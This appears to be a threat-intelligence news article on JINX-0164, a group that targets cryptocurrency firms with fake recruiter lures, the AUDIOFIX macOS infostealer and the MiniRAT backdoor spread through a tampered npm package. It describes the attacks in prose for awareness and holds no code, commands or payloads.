JINX-0164: Unmasking the Cyber Threat Targeting Cryptocurrency Firms
A newly identified cyber threat actor, designated as JINX-0164, has been orchestrating sophisticated attacks against cryptocurrency organizations since at least mid-2025. These operations are primarily financially motivated, aiming to siphon digital assets through advanced social engineering tactics and custom macOS malware.
Sophisticated Social Engineering Tactics
JINX-0164 employs highly convincing social engineering techniques to infiltrate target organizations. The group initiates contact via credible LinkedIn profiles, posing as recruiters offering enticing job opportunities. Unsuspecting victims are invited to virtual meetings, which are actually traps leading them to malicious domains disguised as legitimate teleconference platforms.
During these fraudulent meetings, victims encounter fabricated technical issues and are prompted to download a supposed fix. This deceptive maneuver results in the installation of malware on their systems, granting the attackers unauthorized access.
Deployment of Custom macOS Malware
Central to JINX-0164’s strategy is the deployment of a bespoke macOS malware known as AUDIOFIX. This Python-based infostealer and remote access trojan is delivered through a bash script hosted on a counterfeit driver store domain (apple.driver-store[.]com).
The bash script is designed to detect the system’s architecture, ensuring compatibility with both Intel and Apple Silicon processors. It downloads a payload masquerading as a system audio driver named coreaudiod, saves it as ChromeUpdater, and executes it via launchctl.
Comprehensive Data Exfiltration
Once installed, AUDIOFIX systematically harvests a wide array of sensitive information from the compromised system, including:
– Credentials from password managers, web browsers, and iCloud Keychain files
– Local administrator credentials
– SSH keys
– Configuration and console history files
– Information from cryptocurrency browser extensions
– Cryptocurrency wallet addresses
– Active sessions on platforms like Discord, Slack, and Telegram
Beyond data theft, AUDIOFIX is equipped with commands that enable manual reconnaissance, data exfiltration, execution of arbitrary shell commands, file deletion, and retrieval of additional payloads from external servers.
Lateral Movement and Supply Chain Compromise
JINX-0164’s operations extend beyond initial system compromise. The group demonstrates the capability to move laterally within an organization’s network, targeting internal code distribution systems and development infrastructure. By injecting the AUDIOFIX payload into these systems, the attackers can modify source code, potentially compromising other endpoints and facilitating further cryptocurrency theft.
Utilization of MiniRAT Backdoor
Another significant tool in JINX-0164’s arsenal is MiniRAT, a Go-based backdoor previously distributed via a compromised version of the npm package @velora-dex/sdk. This legitimate DeFi toolkit is used for token swaps, limit orders, and delta trading on the VeloraDEX decentralized exchange platform.
The tampered package downloads a shell script from a remote server, which then delivers a macOS-specific binary called MiniRAT. This malware is capable of uploading files, executing arbitrary shell commands, and fetching additional payloads or tools from attacker-controlled domains.
Potential Links to North Korean Threat Actors
While JINX-0164’s tactics bear similarities to those employed by North Korean cyber groups such as BlueNoroff, Contagious Interview, and UNC1069, current evidence does not establish a direct connection. Notably, there are no infrastructure overlaps linking JINX-0164 to these Pyongyang-associated entities.
Implications for the Cryptocurrency Sector
The emergence of JINX-0164 underscores the evolving and sophisticated nature of cyber threats targeting the cryptocurrency industry. Organizations within this sector must remain vigilant, implementing robust security measures to defend against such advanced persistent threats.
